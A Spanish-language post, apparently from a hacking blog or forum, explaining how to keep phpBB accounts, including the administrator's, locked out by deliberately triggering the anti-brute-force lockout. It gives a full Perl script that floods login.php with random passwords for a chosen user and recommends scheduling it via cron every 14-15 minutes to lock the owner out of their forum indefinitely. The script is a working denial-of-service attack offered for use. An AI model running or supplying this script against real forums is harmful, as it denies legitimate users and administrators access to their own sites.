Pues aqui, un pequeño “bug” si se le puede llamar asi, sobre bloquear cuentas de PhpBB (Administrador incluida) durante 15 minutos.

Si queremos hacer que alguien no pueda acceder a su foro.. no problem my friend! ^^

Con que agreguemos una tarea al cron, que cada 14, 15 min, se ejecute esto que aqui os pego hacia el foro, donde quereis provocar el congelamiento… y ya no hay admin, o usuario que entre

¿Y este error a que es debido?

En verdad, no es ningun error, pero si un bug, ya que se debe a una protección anti bruteforce, que lo que hace, es que cuando fayas un numero de veces una contraseña, la cuenta queda deshabilitada durante esos 15 minutos, y asi no saque la contraseña

¿Que hacemos nosotros?

Pues, fallar la contraseña, sin ningún animo de dar con la del admin

#!/usr/bin/perl
$host=$ARGV[0];
$dirc=$ARGV[1];
$port=$ARGV[2];
$user=$ARGV[3];

$dirsend = “$dirc” . “login.php”;
print “
————————————-
perl phpbb-username-disabler.pl <Host> </Path/> <Port> <Cuenta a bloquear >
————————————–
“;
$i=1;
if ($host ne “”){
while($OK ne 1){

use IO::Socket;
my($socket) =”";
if ($socket = IO::Socket::INET->new(PeerAddr => $host ,
PeerPort => $port ,
Proto => “TCP”))
{

$password=rand();
$data = “username=”.”$user”.”&password=”.”$password”.”&redirect=&login=Connexion
“;
$length = length $data;
print $socket “POST $dirsend HTTP/1.1
Host: $host
Content-Type: application/x-www-form-urlencoded
Content-Length: $length

$data”;
read $socket, $answer, 15;
close($socket);
}
if($answer =~ /HTTP\/(.*?) 302/){$OK = 1;}
$i=$i+”1″;
print “$answer
“;
print “Enviando paquete $i ….
” ;

}}